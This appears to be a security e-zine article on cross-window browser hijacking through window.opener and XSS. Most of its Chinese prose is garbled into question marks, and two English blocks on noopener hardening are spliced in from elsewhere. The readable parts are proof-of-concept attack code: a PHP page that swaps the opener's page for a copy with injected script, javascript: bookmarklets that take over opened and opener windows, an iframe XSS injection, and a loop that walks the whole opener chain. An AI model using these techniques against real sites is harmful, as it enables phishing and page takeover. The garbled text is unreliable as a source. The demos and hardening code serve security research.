==Ph4nt0m Security Team==
Issue 0x03, Phile #0x05 of 0x07
|=---------------------------------------------------------------------------=|
|=---------------=[ ????????????????XSS?????????????? ]=---------------=|
|=---------------------------------------------------------------------------=|
|=---------------------------------------------------------------------------=|
|=------------------------=[ By rayh4c ]=---------------------------=|
|=----------------------=[ <rayh4c#80sec.com> ]=------------------------=|
|=---------------------------------------------------------------------------=|
[??]
1. ???
2. ?????????
3. ???window???????????
4. ???????ù????е??????????
4.1 ??????????????????????????
4.2 ?????????????????????????
5. ??????????????????????
6. ????XSS???????????
6.1 ????細????
6.2 ????細????
6.3 ????Σ????????????y??
6.4 ????Σ?????????細??????
6.5 ????????????
7. ???
8. ?ο?
??????
??????????XSS??????????????????????????д???????????е?????????
????????????????????а????????????????????XSS???Щ???XSS?????Session
????????XSS WORM????????????????????????????????????????????????
?????????????????????????????£??????????XSS????????п????
?????????????
??????????????????????????????????????????????????????????????
??????????????????????????W3C??????????????????????Э?????????????????
??????????????????????Σ???????в?????????06????????????MS06-014????
???????????????????????????ε????????????DOM????????(?ο?2)?е????
????????????????XSS??????????DOM?????????????????????????????
???????window???????????
????????????????????????????????????????window??????????????window??
???к????????????д??????????????????window???????????????????
--code-------------------------------------------------------------------------
<script language="javascript">
for(p in window) document.write(p+"<br>");
</script>
-------------------------------------------------------------------------------
??Щwindow???????????????????????????????????????????Щ??????
????????????????ò????????????????????????window?????????????????
??Щ???????????????????????
???????????????????a.com????????????b.com???window?????????????????
?????????????XSS?????????κ????????????????????????????????????
???????????????????????demo.html??????????????????????????в??????
???????Ч??????ò??????????window??????????????????????location?????
?????????????????????????????????????????????????window?????location
???????б?????????
--demo.html--------------------------------------------------------------------
<script language="javascript">
var newWin;
// Enumerate every property of obj: call each function-valued property and
// print the rest (or the exception thrown on access) in a table.
function allPrpos(obj) {
    var props = "<table><tr><td>Property</td><td>Value</td></tr>";
    for (var p in obj) {
        try {
            if (typeof(obj[p]) == "function") {
                obj[p]();
            } else {
                props += "<tr><td>" + p + "</td><td>" + obj[p] + "</td></tr>";
            }
        } catch (ex) {
            props += "<tr><td>" + p + "</td><td>" + ex.message + "</td></tr>";
        }
    }
    document.write(props + "</table>");
}
// Open a window on another domain and enumerate it once it has had time to load.
function createWin() {
    newWin = window.open("http://www.google.com");
    setTimeout(function(){ allPrpos(newWin) }, 2000);
}
</script>
<button onclick="createWin()">Open window and enumerate its properties</button>
-------------------------------------------------------------------------------
??????????ù????е??????????
4.1 ??????????????????????????
??????????????????IE6??????????????????????????????ms08-058?????????
???????????????????????????????????????????????????????????????
???????????????????????????????location??????????????????????????
?в???????????????????????????location???????
--vul1.html--------------------------------------------------------------------
<script language="javascript">
var newWin;
// Open a window on another domain, then navigate it from the opener side.
function createWin() {
    newWin = window.open("http://www.google.com");
    setTimeout(function(){ newWin.location = "http://www.80sec.com" }, 2000);
}
</script>
<button onclick="createWin()">Open window and change its location</button>
-------------------------------------------------------------------------------
4.2 ?????????????????????????
?????????λ??????????????????????????????????????????????????
??javascriptαЭ?????????????????????????window??????????window.opener??????
?????????????????????????N???????????Щ??????????????????????????
?????????????????????????????????????80SEC?????
--code-------------------------------------------------------------------------
javascript:window.opener.location = "http://www.80sec.com";void(0);
-------------------------------------------------------------------------------
?塢??????????????????????
???????????????????????????????????????????????????????????????
???????????????????????window?????location???????????????????????????
????????????е????е????????п????????????????
?????????????????????????????????????????????????????????????
???????????????????????URL???????????????????????????????????′????
????????????????????????SNS??????????????????BLOG??????????????????????
?????????????????????????????????????????????????滻????????????????
??????????μ?????
??????д???????????????СDemo???·????REFERER???????????棬????????
?????????????????hjk_ref.php?????????????????????http://127.0.0.1/hjk_ref.php
???????????????????????????????????′?????????е??????????????′?????
??3????????????潫???????滻?????????????????????·?????????????????????
????????????飬???е???н?????????????????????
--hjk_ref.php------------------------------------------------------------------
<?php
// Remember which page opened us (it arrives as the Referer of this request).
$Url_Mirror = "";
if (array_key_exists("HTTP_REFERER", $_SERVER)) {
    $Url_Mirror = $_SERVER["HTTP_REFERER"];
}
// Second request: serve a copy of the referring page with an alert appended.
if (isset($_GET["ref"])) {
    echo file_get_contents($_GET["ref"]) . "<script>alert(\"I had been hijacking your browser!\")</script>";
}
?>
<script language="javascript">
// First request: after 3 seconds navigate the opener to this script with the
// referrer URL as the ref parameter, so the opener's page is replaced by the copy.
setTimeout(function(){ window.opener.location = window.location + "?ref=<?php echo rawurlencode($Url_Mirror); ?>" }, 3000);
</script>
-------------------------------------------------------------------------------
??????????????????opera??internet explorer 8??????????????????
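The demo above works only because the page opened by the victim keeps a usable window.opener. An added example (not code from the original article) of the hardening a site owner would apply on the opener side: add rel="noopener noreferrer" to every link that opens a new browsing context, and route window.open calls through a wrapper that always passes the noopener feature. The functions hardenRel, opensNewContext, hardenLinks and openWithoutOpener, the SAMPLE_LINKS array and the .example hostnames are all assumptions made for this example; in a browser the same functions take document.links and window, and the constructed objects below stand in for those so the code also runs under Node.

```javascript
// Added example (not from the original article): opener-side hardening so that
// pages opened from this one get no usable window.opener.

const SEVER_TOKENS = ["noopener", "noreferrer"];

// Return the rel value with noopener/noreferrer added; existing tokens are kept.
function hardenRel(rel) {
  const tokens = new Set(String(rel || "").split(/\s+/).filter(Boolean));
  for (const t of SEVER_TOKENS) tokens.add(t);
  return [...tokens].join(" ");
}

// A link opens a new top-level browsing context unless its target is empty or
// one of the reserved in-page targets.
function opensNewContext(link) {
  const target = String(link.target || "").trim().toLowerCase();
  if (target === "" || ["_self", "_parent", "_top"].includes(target)) return false;
  return true;
}

// Walk a list of anchors (document.links in a browser) and add the rel tokens
// where needed; returns the number of anchors changed.
function hardenLinks(links) {
  let changed = 0;
  for (const link of links) {
    if (!opensNewContext(link)) continue;
    const hardened = hardenRel(link.rel);
    if (hardened !== String(link.rel || "")) {
      link.rel = hardened;
      changed += 1;
    }
  }
  return changed;
}

// Replacement for window.open that always passes "noopener". Browsers return
// null from window.open when noopener is used, so the caller gets no handle to
// the new window and the new window gets no opener.
function openWithoutOpener(win, url, extraFeatures = "") {
  const features = ["noopener", "noreferrer", extraFeatures].filter(Boolean).join(",");
  return win.open(url, "_blank", features);
}

// Constructed sample input standing in for document.links (hostnames are made up).
const SAMPLE_LINKS = [
  { href: "https://partner.example/", target: "_blank", rel: "" },
  { href: "/account", target: "", rel: "" },
  { href: "https://other.example/", target: "popup", rel: "nofollow" },
  { href: "https://already.example/", target: "_blank", rel: "noopener noreferrer" },
];

// In a browser: hardenLinks(document.links) at load time, and use
// openWithoutOpener(window, url) instead of window.open(url).
```

Note the trade-off: with noopener the opening page loses its handle to the new window, so the "opener navigates the child" direction from section 4.1 is closed off as well, and code that relied on the returned window object (for example to call focus on it) has to be adjusted.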
????????XSS???????????
?????????????·????????????????????????.??????????XSS??????
??ú???????????????????????????????????????????????????????????????
XSS?????Ч?????????????????????????????????????????????????????
?????????????????
6.1 ????細????
??????????????hijack_open.js?????????????http://bbs.dvbbs.net/???????
????????????????︴?????????????αЭ?????hijack_open??????????????????
???????????????????????????????????????′??????????????alert???
??????
--hijack_open.js---------------------------------------------------------------
javascript:for(i=0;i<document.links.length;i++){document.links[i].onclick=function(){x=window.open(this.href);setTimeout(function(){try{x.location="javascript:alert('I had been hijacking your browser!')"}catch(e){};return false;},3000);return false;}};void(0);
-------------------------------------------------------------------------------
6.2 ????細????
???????????????????????飬?′???????????????????????︴????????
?????αЭ?????hijack_opener???????????????????汻????????????alert???
??????
--hijack_opener.js-------------------------------------------------------------
javascript:window.opener.location="javascript:alert('I had been hijacking your browser!')";void(0);
-------------------------------------------------------------------------------
6.3 ????Σ????????????y??
??????XSS???????URL????????????????????????????????????XSS???
???????URL???????????????????????window.parent.opener???????????ü????
?????????е??????XSS?????????????????????????????????????????iframe???
???????XSS?????£?
<iframe src="http://www.target.com/index.php?vul=xss" width="0" height="0"></iframe>
??vul??????д???????hijack_frame_opener???????????????????????????
???????
--hijack_frame_opener.js-------------------------------------------------------
<script>
window.parent.opener.location="javascript:alert('I had been hijacking your browser!')";
</script>
-------------------------------------------------------------------------------
6.4 ????Σ?????????細??????
luoluo??????????????????????????????ù???????????????????????window
??opener?????????????????????XSS??????????????ù????????????????????
????????????????????????????????£?
--code-------------------------------------------------------------------------
javascript:(function(){var w=window;while(w.opener){w=w.opener;try{w.location="javascript:alert('I had been hijacking your browser!');void(1);";}catch(e){}}})();void(0);
-------------------------------------------------------------------------------
??????????????A??->B??->A?????????????????A????????????????
????B??????A????棬????????????????
????????細??????????????????????????????????????????????
??к???????????????????????????????????????????????????????
?????????????????????????????????????е??????檔
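The loop in the bookmarklet above follows window.opener upward until it finds no opener, so every window in the chain is reachable from the last one. An added example (not code from the original article) that models this chain with plain objects, so it runs under Node, and shows the two places a defender can cut it: a page can disown its own opener on load (window.opener = null), which protects every window above it, or it can open the next window with the noopener feature, which protects itself as well. The Win class and the functions openFrom, reachableOpeners and demo are assumptions made for this example and stand in for browser WindowProxy objects and window.open.

```javascript
// Added example (not from the original article): a constructed model of the
// opener chain walked in section 6.4, used to show where severing the opener
// reference stops the walk.

class Win {
  constructor(name, opener = null) {
    this.name = name;      // label for the report only, not a browser property
    this.opener = opener;  // mirrors window.opener
  }
  // What a page can do at load time: disown whoever opened it. Returns whether
  // there was an opener to disown.
  disownOpener() {
    const had = this.opener !== null;
    this.opener = null;
    return had;
  }
}

// Model of window.open(): the new window's opener is the caller unless the
// caller passed the "noopener" feature.
function openFrom(caller, name, features = "") {
  const noopener = features.split(",").map(s => s.trim().toLowerCase()).includes("noopener");
  return new Win(name, noopener ? null : caller);
}

// Names of every window reachable by walking `opener` upward from `start`:
// the set of pages a script in `start` could attempt to navigate.
function reachableOpeners(start) {
  const reached = [];
  let w = start.opener;
  while (w) {
    reached.push(w.name);
    w = w.opener;
  }
  return reached;
}

function demo() {
  // Chain A -> B -> C opened without precautions: C reaches B and A.
  const a = new Win("A");
  const b = openFrom(a, "B");
  const c = openFrom(b, "C");
  const before = reachableOpeners(c);          // ["B", "A"]

  // Mitigation 1: B disowns its opener on load. C still reaches B, but not A.
  b.disownOpener();
  const afterDisown = reachableOpeners(c);     // ["B"]

  // Mitigation 2: B opens the next window with noopener. It reaches nothing.
  const c2 = openFrom(b, "C2", "noopener");
  const afterNoopener = reachableOpeners(c2);  // []

  return { before, afterDisown, afterNoopener };
}
```

Disowning the opener only protects the windows above the page that does it; the page itself is still reachable from the window it opened, which is why the noopener feature (or rel="noopener" on links) is the stronger of the two.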
6.5 ????????????
???????????????????????????????????????????????????????????
???????????????????????????????????????κ??????????顣?????????????XSS
?????????????????Χ??????????????????????????????XSS?????Ч?????
????????????????????????????????????????????????????????????
?о?????????????????????????XSS?????????????????????????????????
????????? - ??????????????
??????
?????漰?????????????????о?????????????Щ????????????????????
?????????????ì???壬????????·?????????????л???????????·?????????
????????luoluo??cnqing??linx???80Sec???????г????
????ο?
1. http://en.wikipedia.org/wiki/Same_origin_policy
2. http://code.google.com/p/browsersec/wiki/Part2#Same-origin_policy_for_DOM_access
3. http://www.w3.org/TR/Window/
4. http://www.80sec.com/release/browser-hijacking.txt
5. http://www.80sec.com/all-browser-security-alert.html
6. http://www.80sec.com/ms08-058-attacks-google.html
-EOF-